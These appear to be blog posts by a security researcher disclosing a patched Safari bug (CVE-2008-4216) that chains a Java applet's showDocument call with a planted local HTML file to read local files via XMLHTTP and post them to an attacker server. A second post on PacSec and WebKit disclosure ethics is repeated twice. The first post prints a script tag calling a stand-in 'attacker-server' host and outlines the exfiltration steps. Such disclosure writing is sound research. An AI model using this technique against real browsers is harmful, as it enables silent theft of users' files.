Apple recently patched a vulnerability Nitesh "Leisure Suit" Dhanjani and I reported to them last week (CVE-2008-4216). We had reported a similar vulnerability to Apple about two months ago (CVE-2008-3638). In fact, the exploitation technique was so similar we held off releasing details until this 2nd patch was released.
The basic gist of this vulnerability pits a browser and a browser plug-in against each other in order to cross a subtle, but important boundary. The issue starts simply enough with a victim visiting an attackers webpage. Once on the attacker’s webpage, the attacker simply loads a Java Applet. Inside of the applet is a call to getAppletContext().showDocument(URL);
getAppletContext().showDocument(URL) basically has the browser open a new browser window with the URL passed to showDocument(). Normally, browsers will not let remote sites open new browser windows which point to local files. It seemed that Safari had some issues determining the specific “rights” for windows opened via Java Applets and allowed getAppletContext().showDocument() to force the browser to open a file from the user’s local file system.
Now here is where things get interesting… Opening a local file in the browser isn’t very useful unless we can open and render/execute content that we control. There are a couple ways plant our content in a predictable location using Safari. Safari, by default has a reasonably predictable location for cached/temporary files. We can use these predictable locations to load our content, we’ll have some guessing to do, but it works… Safari can also be forced to dump user controlled contents to the “c:\temp” directory (in Windows, of course), which makes thing far more predictable making the attack a lot less noisy. I’m not sure if Apple considers the “c:\temp” issue a bug, but just in case they do I won’t go over the details for the “c:\temp” trick just yet.
In case you’re wondering, Internet Explorer and FireFox use a random, 8 character directory name to prevent guessing of temporary file locations.
Once we’ve planted our contents to a predictable location, it’s now simply a matter of having the Java Applet call the file we’ve planted. We have unlimited guesses to get the location and file name right, but the more guesses the more noisy the attack (obviously). The file we’ve planted is an HTML file which loads an XMLHTTP object, which is used to steal files from the local file system. You can include a <script src=”http://attacker-server/remote-control.js></script> if you want to remotely control the script running on the local file system. Safari allows script to be executed from local files without warning, so once we get the right location and filename for our planted HTML file, files can be stolen off the local file system without user interaction or warnings.
Internet Explorer presents a warning before executing script from local files and FireFox (as of FireFox3) restricts XMLHTTP loaded from the local file system to the directory the html file was loaded from (and any subdirectories).
Once we have the contents of the file in JavaScript space, we simple encode the contents and POST the contents to our attacker web server. There you go... Stealing Files with Safari!
Tuesday, November 18, 2008
Pwnichiwa from PacSec!
WOW, it’s been a busy couple of weeks! I was in Tokyo last week for PacSec. PacSec was a great time, there were some GREAT talks, and Dragos knows how to party! I co-presented a talk entitled “Cross-Domain Leakiness: Divulging Sensitive Information and Attacking SSL Sessions” with Chris Evans from Google. I’m curious if this was the first time in history a Google Guy and a Microsoft Guy got on stage together and talked about security... Anyway, you can find the slides here:
Chris is a super smart guy and demo’d a ton of browser bugs, most of which he will eventually discuss on his blog (which you should check out). I had a chance to demo a few bugs and went over some techniques to steal Secure Cookies over SSL connections for popular sites. Now, before I get into the details of the Safari File Stealing bug that was recently patched (provided in the next post) I did want to talk a bit about WebKit.
<WARNING Non-Technical Content Follows!>
You were warned! Some friends and I have been playing around with Safari (we've got a couple bugs in the pipeline). As everyone knows, Safari is based on the WebKit browser engine. I think WebKit is a great browser engine and apparently so does Google because they use it for their Google Chrome. So, once I discover and report a vulnerability in Safari for the Windows, Apple must also check Safari for Mac, and Safari Mobile for iPhone. Additionally, “someone” should probably let Google know as their Chrome browser also takes a dependency on WebKit. Now, who is this “someone”? Is it the researcher? Is it Apple? Does the researcher have a responsibility to check to ensure this vulnerability doesn’t affect Chrome? Does Apple have a responsibility to give Google the details of a vulnerability reported to them? Our situation works today because we’ve got great people working for Apple and Google (like Aaron and Chris) who have the means to cooperate and work for the greater good. However, as security moves higher and higher on the marketing scorecards and becomes more and more of a “competitive advantage” at what point will goodwill stop and the business sense take over?
Let’s contemplate a scenario that isn't so black and white… Let’s say two vendors both take a dependency on WebKit. An issue is discovered, but the differences in the two browsers make it so that the implementation for the fix is different. Vendor A has a patch ready to go, Vendor B on the other hand has a more extensive problem and needs a few more days/weeks/months. Should Vendor A wait for Vendor B to complete their patch process before protecting their own customers and pushing patches for their own products?
Let’s flip the scenario… Let’s say Vendor A has a vulnerability reported to them. Vendor A determines that the issue is actually in WebKit. Vendor A contacts Vendor B and discovers that Vendor B isn’t affected… does this mean Vendor B knew about issue, fixed the issue, and didn’t tell Vendor A? Do they have a responsibility to?
Chris is a super smart guy and demo’d a ton of browser bugs, most of which he will eventually discuss on his blog (which you should check out). I had a chance to demo a few bugs and went over some techniques to steal Secure Cookies over SSL connections for popular sites. Now, before I get into the details of the Safari File Stealing bug that was recently patched (provided in the next post) I did want to talk a bit about WebKit.
<WARNING Non-Technical Content Follows!>
You were warned! Some friends and I have been playing around with Safari (we've got a couple bugs in the pipeline). As everyone knows, Safari is based on the WebKit browser engine. I think WebKit is a great browser engine and apparently so does Google because they use it for their Google Chrome. So, once I discover and report a vulnerability in Safari for the Windows, Apple must also check Safari for Mac, and Safari Mobile for iPhone. Additionally, “someone” should probably let Google know as their Chrome browser also takes a dependency on WebKit. Now, who is this “someone”? Is it the researcher? Is it Apple? Does the researcher have a responsibility to check to ensure this vulnerability doesn’t affect Chrome? Does Apple have a responsibility to give Google the details of a vulnerability reported to them? Our situation works today because we’ve got great people working for Apple and Google (like Aaron and Chris) who have the means to cooperate and work for the greater good. However, as security moves higher and higher on the marketing scorecards and becomes more and more of a “competitive advantage” at what point will goodwill stop and the business sense take over?
Let’s contemplate a scenario that isn't so black and white… Let’s say two vendors both take a dependency on WebKit. An issue is discovered, but the differences in the two browsers make it so that the implementation for the fix is different. Vendor A has a patch ready to go, Vendor B on the other hand has a more extensive problem and needs a few more days/weeks/months. Should Vendor A wait for Vendor B to complete their patch process before protecting their own customers and pushing patches for their own products?
Let’s flip the scenario… Let’s say Vendor A has a vulnerability reported to them. Vendor A determines that the issue is actually in WebKit. Vendor A contacts Vendor B and discovers that Vendor B isn’t affected… does this mean Vendor B knew about issue, fixed the issue, and didn’t tell Vendor A? Do they have a responsibility to?
Subscribe to:
Posts (Atom)